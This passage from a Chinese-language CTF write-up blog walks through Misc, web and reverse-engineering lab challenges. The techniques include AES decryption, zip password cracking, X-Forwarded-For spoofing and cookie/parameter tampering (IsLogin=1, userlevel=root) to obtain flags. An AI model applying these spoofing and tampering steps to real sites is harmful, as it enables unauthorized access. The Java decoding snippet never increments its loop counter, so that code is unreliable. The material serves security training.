64 bytes from 111.13.101.208 (111.13.101.208): icmp_seq=2 ttl=48 time=32.1 ms
64 bytes from 111.13.101.208 (111.13.101.208): icmp_seq=3 ttl=48 time=34.7 ms
64 bytes from 111.13.101.208 (111.13.101.208): icmp_seq=4 ttl=48 time=31.9 ms
..^C
--- baidu.com ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3037ms
rtt min/avg/max/mdev = 31.921/33.067/34.784/1.155 ms
[root@localhost wireshark]# cat 3
# coding:utf-8

__author__ = 'YFP'

from Crypto import Random

from Crypto.Cipher import AES

import sys

import base64

IV = 'QWERTYUIOPASDFGH'

def decrypt(encrypted):

  aes = AES.new(IV, AES.MODE_CBC, IV)

  return aes.decrypt(encrypted)

def encrypt(message):

  length = 16

  count = len(message)

  padding = length - (count % length)

  message = message + '\0' * padding

  aes = AES.new(IV, AES.MODE_CBC, IV)

  return aes.encrypt(message)

str = 'this is a test'

example = encrypt(str)

print(decrypt(example))

可以发现1是一个rar,2是一段字符串,3是一个加密代码

考虑2是通过3加密后的rar密码,通过代码反解,得到压缩包密码,获得flag。

from Crypto import Random
from Crypto.Cipher import AES

import sys
import base64
IV = "QWERTYUIOPASDFGH"
IV=IV.encode('UTF-8')
def decrypt(encrypted):
  aes = AES.new(IV, AES.MODE_CBC, IV)
  return aes.decrypt(encrypted)
def encrypt(message):
  length = 16
  count = len(message)
  padding = length - (count % length)
  message = message + '\0' * padding
  aes = AES.new(IV, AES.MODE_CBC, IV)
  return aes.encrypt(message)

str = "this is a test"

example = base64.b64decode("19aaFYsQQKr+hVX6hl2smAUQ5a767TsULEUebWSajEo=")

print(decrypt(example))

24、黑客入侵

有黑客入侵了我们的网站,请通过流量分析,确认黑客窃取的数据

打开发现是被sql注入,找到每次注入的最后一次尝试,拼接获得flag字符串。

25、Welcome

把图片丢进010editor,发现存在压缩包,直接改名解压

获得一个压缩包和一个提示,提示可以知道是JQK,多大的脑洞能猜到是对应的键盘数字178?

随后用三个数爆破压缩包,得到一张图,010editor打开在结尾获得flag。

26、神秘的图片

神秘人入侵了公司某系统,并留下了一张图片,你能否在图片中找到神秘人留下的信息?Hint:CRC 二维码

根据提示,先进行CRC校验检查宽高,获得前半段flag,并获得提示后半段在文件末尾

把文件末尾的点和空格导出,替换为0和1,通过代码生成二维码,获得flag后半段

from PIL import Image
from zlib import *

MAX=100
pic=Image.new("RGB",(MAX,MAX))
str="10101010"  //替换实际字符串
i=0
for y in range(0,MAX):
    for x in range(0, MAX):
        if(str[i]=='1'):
            pic.putpixel([x,y],(0,0,0))
        else:
            pic.putpixel([x, y], (255,255,255))
        i=i+1
pic.show()
pic.save("test.png")

27、MISC300

黑客利用FTP加密传输,你能从中获取flag吗?

根据提示,导出FTP对象,获得压缩包与key.log,把key添加到TLS的log file里面,解密http流量,解密后发现一个压缩包,导出分组字节流,获得2.mp3文件。

查看频谱图,获得解压密码,得到flag。

28、EASER

压缩包综合

第一个包提示:小明喜欢用自己的手机号来加密zip,我们通过社工只查到了他手机号的前三位为199,你能解开这个压缩包吗?(手机号为伪造手机号,请不要试图拨打或社工)

使用11位纯数字,199开头进行掩码攻击,获得解压密码,得到第二个包。

第二个包没有任何提示,但是包内外存在同名文件,压缩readme.txt后发现CRC相同,可以使用明文攻击,获得三个key,得到破解后的压缩包

压缩包3进行伪加密破解,得到最后图片,CRC重算宽高,获得flag。

Base

1、php-base1

查看源码获得flag

2、php-base2

从请求的返回头重获得flag

3、php-base3

提示你确定是本地管理员吗,需要把IP改为本地,头部添加X-Forwarded-For:127.0.0.1获得flag

4、php-base4

提示需要提交PHP version,从请求的返回头中获取版本号提交即可。

5、php-base5

还不会

6、php-base6

页面标题提示password.txt,访问后获得密码字典,爆破登录,获得实际密码,但是无法登陆,因为密码框限制了长度,修改前端代码后正常登录。

登录获得提示“这里没有flag”,从网络请求中发现cookie中存在提示:

newpage=MjkwYmNhNzBjN2RhZTkzZGI2NjQ0ZmEwMGI5ZDgzYjkucGhw;
base64解码得到新页面
290bca70c7dae93db6644fa00b9d83b9.php

来到小黑的留言板,提示要以小黑身份进行,填点内容用BP抓包,发现存在几个变量

Cookie: IsLogin=0

content=test&userlevel=guest&Submit=%C1%F4%D1%D4

修改后重发即可在返回头获得flag

Cookie: IsLogin=1

content=test&userlevel=root&Submit=%C1%F4%D1%D4

Reverse

1、APK1-bin.apk

反编译可获得flag

2、APK2-bin2.apk

反编译后可知,是将包名计算md5后用flag{}套起来与输入进行比较

3、APK3-bin3.apk

用Java还原代码,随后十进制转asscii即可

public class test {

    public static void main(String[] args){
        String flag = "B3DAC6B/8E/06AD762A08D/320@3A7/4";
        int i = 0;
        while (i < 32){
            System.out.println(flag.charAt(i) + '\001');
        }
        
    }
}

4、APK4-bin4.apk

异或即可

flag=[84, 83, 32, 32, 37, 82, 84, 81, 84, 39, 81, 38, 85, 33, 39, 33, 33, 38, 80, 84, 81, 32, 90, 39, 90, 37, 33, 82, 85, 33, 87, 39]
ipt=""
for i in range(0,32):
    ipt+=chr(flag[i] ^ 0x63)
print(ipt)

5、C.exe

C#文件,使用dnSpy打开,发现Letters串按特定顺序输出,还原即可。

public char[] Letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ{}_".ToCharArray();

MessageBox.Show(new string(new char[]
{
	this.Letters[5],
	this.Letters[11],
	this.Letters[0],
	this.Letters[6],
	this.Letters[26],
	this.Letters[8],
	this.Letters[28],
	this.Letters[11],
	this.Letters[14],
	this.Letters[21],
	this.Letters[4],
	this.Letters[28],
	this.Letters[5],
	this.Letters[14],
	this.Letters[13],
	this.Letters[25],
	this.Letters[24],
	this.Letters[27]
}));

6、Crackme1.exe

扔进x32dbg中,运行程序后搜索当前模块字符串,找到关键代码,是将输入串与52popjie做比较

7、UPX_

在die里面可以识别为UPX packer,进行脱壳

脱壳后静态调试不通,用x32dbg动态调试,运行后找到关键字符串“成功了”,与HackAv作比较

8、helloELF

扔进Ida发现flag串

9、BASE

丢进Ida,发现是将输入串加密后与ZmxhZ#tiYXNlNjRfRjRubnl(作比较。

if ( !strcmp(s1, "ZmxhZ#tiYXNlNjRfRjRubnl(") )
    puts("Success!");

看加密函数

void *__fastcall sub_92A(char *a1, unsigned __int64 a2, _QWORD *a3)
{
  int v4; // eax
  int v5; // eax
  int v6; // eax
  int v7; // [rsp+24h] [rbp-1Ch]
  int v8; // [rsp+24h] [rbp-1Ch]
  int v9; // [rsp+24h] [rbp-1Ch]
  int i; // [rsp+28h] [rbp-18h]
  int v11; // [rsp+2Ch] [rbp-14h]
  char *v12; // [rsp+30h] [rbp-10h]
  void *s; // [rsp+38h] [rbp-8h]

  if ( !a1 || !a2 )
    return 0LL;
  v7 = a2 / 3;
  if ( v7 % 3 )
    ++v7;
  v8 = 4 * v7;
  *a3 = v8;
  s = malloc(v8 + 1);
  if ( !s )
    return 0LL;
  memset(s, 0, v8 + 1);
  v12 = a1;
  v9 = a2;
  v11 = 0;
  while ( v9 > 0 )
  {
    byte_20201A = 0;
    byte_202019 = 0;
    byte_202018[0] = 0;
    for ( i = 0; i <= 2 && v9 > 0; ++i )
    {
      byte_202018[i] = *v12;
      --v9;
      ++v12;
    }
    if ( !i )
      break;
    switch ( i )
    {
      case 2:
        *((_BYTE *)s + v11) = aAbcdefghijklmn[(unsigned __int8)byte_202018[0] >> 2];
        *((_BYTE *)s + v11 + 1) = aAbcdefghijklmn[((unsigned __int8)byte_202019 >> 4) | (16 * byte_202018[0]) & 0x30];
        *((_BYTE *)s + v11 + 2) = aAbcdefghijklmn[((unsigned __int8)byte_20201A >> 6) | (4 * byte_202019) & 0x3C];
        v5 = v11 + 3;
        v11 += 4;
        *((_BYTE *)s + v5) = 61;
        break;
      case 3:
        *((_BYTE *)s + v11) = aAbcdefghijklmn[(unsigned __int8)byte_202018[0] >> 2];
        *((_BYTE *)s + v11 + 1) = aAbcdefghijklmn[((unsigned __int8)byte_202019 >> 4) | (16 * byte_202018[0]) & 0x30];
        *((_BYTE *)s + v11 + 2) = aAbcdefghijklmn[((unsigned __int8)byte_20201A >> 6) | (4 * byte_202019) & 0x3C];
        v6 = v11 + 3;
        v11 += 4;
        *((_BYTE *)s + v6) = aAbcdefghijklmn[byte_20201A & 0x3F];
        break;
      case 1:
        *((_BYTE *)s + v11) = aAbcdefghijklmn[(unsigned __int8)byte_202018[0] >> 2];
        *((_BYTE *)s + v11 + 1) = aAbcdefghijklmn[((unsigned __int8)byte_202019 >> 4) | (16 * byte_202018[0]) & 0x30];
        *((_BYTE *)s + v11 + 2) = 61;
        v4 = v11 + 3;
        v11 += 4;
        *((_BYTE *)s + v4) = 61;
        break;
    }
  }
  *((_BYTE *)s + v11) = 0;
  return s;
}

自定义的base64,秘钥为

aAbcdefghijklmn 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz)!@#$%^&*(+/='

10、maze

静态获得的map有错,用Ida链接linux动态调试,内存中复制出map后走迷宫。

11、Reverse000.exe

根据提示查找特征字符串,找到对应函数位置

标签: 暂无
最后更新:2023年12月15日

Lufer

新的一天开始啦

点赞
< 上一篇

文章评论

razz evil exclaim smile redface biggrin eek confused idea lol mad twisted rolleyes wink cool arrow neutral cry mrgreen drooling persevering
取消回复

文章目录
  • Web
    • 1、php_weak_1
    • 2、php_weak_2
    • 3、lfi_demo
    • 4、unser-demo
    • 5、exec_1
    • 6、unser_1
    • 7、php_weak_3
    • 8、unser_2
    • 9、lfi_2
    • 10、unser_3
    • 11、unser_4
    • 12、up-lfi
  • Crypto
    • 1、贝斯
    • 2、一只小羊跳过了3个栅栏
    • 3、Xor_1
    • 4、不仅仅是base
    • 5、套娃
    • 6、降龙十八掌
    • 7、RSA1
    • 8、贝斯?
    • 9、RAS
    • 10、变异的凯撒
    • 11、Xor_2
    • 12、凯撒?替换?呵呵!
    • 13、奇怪的指令
    • 14、AES—mess
    • 15、AES
    • 16、猜猜我是谁
    • 17、des-ecb
    • 18、crpher
    • 19、ezsm
    • 20、这里什么都没有
  • Misc
    • 1、wireshark
    • 2、logon
    • 3、ping
    • 4、telnet
    • 5、sublime
    • 6、meinv.jpg
    • 7、Fonts
    • 8、眼见非实
    • 9、ameng.jpg
    • 10、goodguys
    • 11、blue
    • 12、Virtual
    • 13、sound
    • 14、提取
    • 15、ssl
    • 16、findtheflag
    • 17、流量解密
    • 18、UP
    • 19、2的平方
    • 20、zip伪加密
    • 21、一起来看图
    • 22、后门连接
    • 23、瞒天过海
    • 24、黑客入侵
    • 25、Welcome
    • 26、神秘的图片
    • 27、MISC300
    • 28、EASER
  • Base
    • 1、php-base1
    • 2、php-base2
    • 3、php-base3
    • 4、php-base4
    • 5、php-base5
    • 6、php-base6
  • Reverse
    • 1、APK1-bin.apk
    • 2、APK2-bin2.apk
    • 3、APK3-bin3.apk
    • 4、APK4-bin4.apk
    • 5、C.exe
    • 6、Crackme1.exe
    • 7、UPX_
    • 8、helloELF
    • 9、BASE
    • 10、maze
    • 11、Reverse000.exe

COPYRIGHT © 2022 lufer.cc.

Theme Kratos Made By Seaton Jiang

鲁ICP备2021045819号